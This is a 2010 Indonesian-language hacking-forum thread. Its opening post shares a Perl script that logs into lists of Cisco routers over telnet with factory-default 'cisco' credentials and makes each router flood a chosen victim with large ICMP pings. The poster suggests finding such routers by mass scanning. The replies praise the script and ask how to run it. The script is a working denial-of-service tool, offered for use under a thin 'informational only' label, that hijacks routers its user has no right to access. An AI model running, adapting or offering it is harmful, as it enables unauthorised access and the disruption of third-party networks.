Home General Computer Multimedia Business Lounge

Post Reply 
DDOS based on ICMP echo request
08-09-2010, 05:57 PM (This post was last modified: 08-09-2010 05:58 PM by El-Farhatz.)
Post: #1
DDOS based on ICMP echo request
Prof of concept of a simple DDOS program based on ICMP echo request from cisco routers.
With mass scanner you can get an important list of cisco default install
and by looking to their MTU and throughtput, you may tune the ICMP size to DOS a big network in few seconds
the program is informational only, please keep it on this way
Code:
#!/usr/bin/perl
use Parallel::ForkManager;
use Net::Telnet();
use Net::Telnet::Cisco;
use strict;
sub usage {
print “\n\n\e[00;34mddsco.pl [victim] [cisco file list] \e[00m \n\n";
exit;
}
my $victim = $ARGV[0];
my $file = $ARGV[1];
if ((!$victim) or (!$file)) {
usage;
}
my $login = “cisco”;
my $passwd = “cisco”;
my $enable = “cisco”;
my $mtu = 1500;
my $cmd = “ping “.$victim.” size 1500 df-bit repeat 1000″;
open FILE, “<$file” or die $!;
my $pm = new Parallel::ForkManager(100);
for (1..1000) {
while () {
$pm->start and next;
my $host = $_;
my $session = Net::Telnet::Cisco->new(Host => $host);
$session->login($login, $passwd);
$session->enable($enable);
$session->cmd($cmd);
$pm->finish; ## end point of the parallel process
}
}
$pm->wait_all_children; ## wait for the child processes


Regrads

El-Farhatz
Find all posts by this user
Quote this message in a reply
08-09-2010, 07:17 PM
Post: #2
RE: DDOS based on ICMP echo request
mantep deh, tapi lebih cocok dengan intilah/judul " flooding" deh, kalau menurut ane. karena dia mengirimkan icpm (Internet Control Message Protocol), kalau ddos harus melalui perantara zombie. tapi mantep mas scriptnya. <---- maaf mas, ane hanya newbie biasa. bukannya sok tau.
Visit this user's website Find all posts by this user
Quote this message in a reply
08-09-2010, 07:44 PM
Post: #3
RE: DDOS based on ICMP echo request
yups , memang bro , tapi ini bisa dijadikan konsep dasar wat DDOs , karena untuk masalah zombienya dah banyak yg bahas kan , soalnya di trick yg laen ada wat defense bro ketawa ,

mantap
Find all posts by this user
Quote this message in a reply
08-09-2010, 07:50 PM
Post: #4
RE: DDOS based on ICMP echo request
ok2 sep mantep deh mas,
Visit this user's website Find all posts by this user
Quote this message in a reply
08-09-2010, 08:10 PM (This post was last modified: 08-09-2010 08:50 PM by patriot.)
Post: #5
RE: DDOS based on ICMP echo request
hadooh bahasa linggis...!!! gk ngarti
newbie nyimak aja dagh...! om klo bisa di tulis cara make'y juga. :)
thank'z for share
Visit this user's website Find all posts by this user
Quote this message in a reply
08-09-2010, 09:20 PM
Post: #6
RE: DDOS based on ICMP echo request
(08-09-2010 08:10 PM)patriot Wrote:  hadooh bahasa linggis...!!! gk ngarti
newbie nyimak aja dagh...! om klo bisa di tulis cara make'y juga. :)
thank'z for share

bener bener klo bisa pake b.sunda juga boleh mas om stress
Find all posts by this user
Quote this message in a reply
08-11-2010, 08:37 PM
Post: #7
RE: DDOS based on ICMP echo request
hehe maklum newbie bahasa linggis juga , tuh baru belajar ketawa , ntar dibahas pas gath aja dech ;D ... hehe insya allah kalo ga lupa ketawa
Find all posts by this user
Quote this message in a reply
10-26-2010, 01:31 PM
Post: #8
RE: DDOS based on ICMP echo request
Kok eror ya kak...?
Find all posts by this user
Quote this message in a reply
10-26-2010, 01:37 PM (This post was last modified: 10-26-2010 01:45 PM by El-Farhatz.)
Post: #9
RE: DDOS based on ICMP echo request
eroor dimana nya yaks ketawa , coba tak ceking dolo ketawa
(08-09-2010 08:10 PM)patriot Wrote:  hadooh bahasa linggis...!!! gk ngarti
newbie nyimak aja dagh...! om klo bisa di tulis cara make'y juga. :)
thank'z for share

ini wat ngeflood router cisco om ....
Find all posts by this user
Quote this message in a reply
10-26-2010, 01:47 PM
Post: #10
RE: DDOS based on ICMP echo request
(10-26-2010 01:31 PM)batamcyber Wrote:  Kok eror ya kak...?

Yang ini mas bro farhatz, bukan comment ane. hhee..!!!hmm
Visit this user's website Find all posts by this user
Quote this message in a reply
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  Stop DDOS attacks on a cisco router El-Farhatz 10 3,136 08-12-2010 11:33 PM
Last Post: El-Farhatz

Users Browsing
1 Guest(s)


Stop SOPA/PIPA | Discuss !